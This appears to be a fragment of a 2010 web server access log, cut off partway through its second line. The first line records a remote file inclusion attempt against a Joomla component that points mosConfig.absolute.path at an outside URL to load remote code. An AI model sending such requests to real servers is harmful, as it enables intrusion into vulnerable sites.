121.254.172.27 - - [04/Mar/2010:11:23:14 -0800] "GET /logs/access_100210.log%20%20//component/option,com_joomap//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [04/Mar/2010:11:23:21 -0800] "GET /logs/access_1